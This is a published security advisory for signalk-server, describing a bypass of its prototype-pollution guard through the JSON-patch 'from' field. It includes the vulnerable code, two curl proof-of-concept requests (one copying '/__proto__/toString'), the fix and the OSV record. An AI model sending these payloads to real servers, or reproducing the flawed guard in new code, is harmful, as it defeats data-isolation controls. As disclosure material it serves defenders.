GHSA-QH3J-MRG8-F234

Vulnerability from github – Published: 2026-04-03 04:04 – Updated: 2026-04-03 04:04
VLAI?
Summary
Signal K Server: Arbitrary Prototype Read via `from` Field Bypass
Details

Summary

The /signalk/v1/applicationData/... JSON-patch endpoint allows users to modify stored application data. To prevent Prototype Pollution, the developers implemented an isPrototypePollutionPath guard. However, this guard only checks the path property of incoming JSON-patch objects. It completely fails to check the from property. Because JSON-patch operations like copy and move extract data using the from property path, an attacker can construct a payload where from targets /proto/someProperty, completely evading the security check and successfully executing an Arbitrary Prototype Read.

While this does not allow arbitrary code execution (as the destination path remains protected from proto), it does allow a user to exfiltrate internal Node functions and prototype state into their own application data.

Vulnerability Root Cause

File: src/interfaces/applicationData.js (Lines 48-57)

const DANGEROUS_PATH_SEGMENTS = ['__proto__', 'constructor', 'prototype']

function isPrototypePollutionPath(pathString) {
  const segments = pathString.split(/[./]/)
  return segments.some((seg) => DANGEROUS_PATH_SEGMENTS.includes(seg))
}

function hasPrototypePollutionPatch(patches) {
  return patches.some(
    // [!VULNERABLE] Only checks patch.path, completely ignores patch.from
    (patch) => patch.path && isPrototypePollutionPath(patch.path) 
  )
}

At Line 201:

if (hasPrototypePollutionPatch(req.body)) {
  res.status(400).send('invalid patch path')
  return
}
jsonpatch.apply(applicationData, req.body) // jsonpatch natively resolves 'from'

Proof of Concept (PoC)

Verify the Developer Guard Works (The Blocked Payload):

curl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '[{"op": "add", "path": "/__proto__/polluted", "value": "hacked"}]'

Result: 400 Bad Request - invalid patch path

Execute the Bypass (The Malicious Payload):

curl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '[{"op": "copy", "from": "/__proto__/toString", "path": "/stolen"}]'

Result: 200 OK - ApplicationData saved The security guard is bypassed and the json-patch engine successfully copies the proto internal function reference.

Screenshot 2026-03-24 150440

Security Impact

This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should.

Fixing Arbitrary Prototype Read

The hasPrototypePollutionPatch function must be updated to inspect ALL path-related fields:

function hasPrototypePollutionPatch(patches) {
  return patches.some(
    (patch) => 
      (patch.path && isPrototypePollutionPath(patch.path)) ||
      (patch.from && isPrototypePollutionPath(patch.from))
  )
}
Severity ?
2.1 (Low)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "signalk-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35038"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-125",
      "CWE-20",
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T04:04:22Z",
    "nvd_published_at": "2026-04-02T17:16:27Z",
    "severity": "LOW"
  },
  "details": "## Summary \n\nThe /signalk/v1/applicationData/... JSON-patch endpoint allows users to modify stored application data. To prevent Prototype Pollution, the developers implemented an isPrototypePollutionPath guard. However, this guard only checks the path property of incoming JSON-patch objects. It completely fails to check the from property. Because JSON-patch operations like copy and move extract data using the from property path, an attacker can construct a payload where from targets /__proto__/someProperty, completely evading the security check and successfully executing an Arbitrary Prototype Read.\n\nWhile this does not allow arbitrary code execution (as the destination path remains protected from __proto__), it does allow a user to exfiltrate internal Node functions and prototype state into their own application data.\n\n## Vulnerability Root Cause \n\nFile: src/interfaces/applicationData.js (Lines 48-57)\n```\nconst DANGEROUS_PATH_SEGMENTS = [\u0027__proto__\u0027, \u0027constructor\u0027, \u0027prototype\u0027]\n\nfunction isPrototypePollutionPath(pathString) {\n  const segments = pathString.split(/[./]/)\n  return segments.some((seg) =\u003e DANGEROUS_PATH_SEGMENTS.includes(seg))\n}\n\nfunction hasPrototypePollutionPatch(patches) {\n  return patches.some(\n    // [!VULNERABLE] Only checks patch.path, completely ignores patch.from\n    (patch) =\u003e patch.path \u0026\u0026 isPrototypePollutionPath(patch.path) \n  )\n}\n```\nAt Line 201:\n```\nif (hasPrototypePollutionPatch(req.body)) {\n  res.status(400).send(\u0027invalid patch path\u0027)\n  return\n}\njsonpatch.apply(applicationData, req.body) // jsonpatch natively resolves \u0027from\u0027\n\n```\n## Proof of Concept (PoC)\n\nVerify the Developer Guard Works (The Blocked Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d \u0027[{\"op\": \"add\", \"path\": \"/__proto__/polluted\", \"value\": \"hacked\"}]\u0027\n```\nResult: 400 Bad Request - invalid patch path\n\nExecute the Bypass (The Malicious Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d \u0027[{\"op\": \"copy\", \"from\": \"/__proto__/toString\", \"path\": \"/stolen\"}]\u0027\n```\nResult: 200 OK - ApplicationData saved The security guard is bypassed and the json-patch engine successfully copies the __proto__ internal function reference.\n\n\u003cimg width=\"1222\" height=\"230\" alt=\"Screenshot 2026-03-24 150440\" src=\"https://github.com/user-attachments/assets/5ae580fd-284f-4bef-adc8-31b50b8751b6\" /\u003e\n\n## Security Impact\nThis vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should.\n\n## Fixing Arbitrary Prototype Read\n\nThe hasPrototypePollutionPatch function must be updated to inspect ALL path-related fields:\n```\nfunction hasPrototypePollutionPatch(patches) {\n  return patches.some(\n    (patch) =\u003e \n      (patch.path \u0026\u0026 isPrototypePollutionPath(patch.path)) ||\n      (patch.from \u0026\u0026 isPrototypePollutionPath(patch.from))\n  )\n}\n```",
  "id": "GHSA-qh3j-mrg8-f234",
  "modified": "2026-04-03T04:04:22Z",
  "published": "2026-04-03T04:04:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35038"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SignalK/signalk-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Signal K Server: Arbitrary Prototype Read via `from` Field Bypass"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.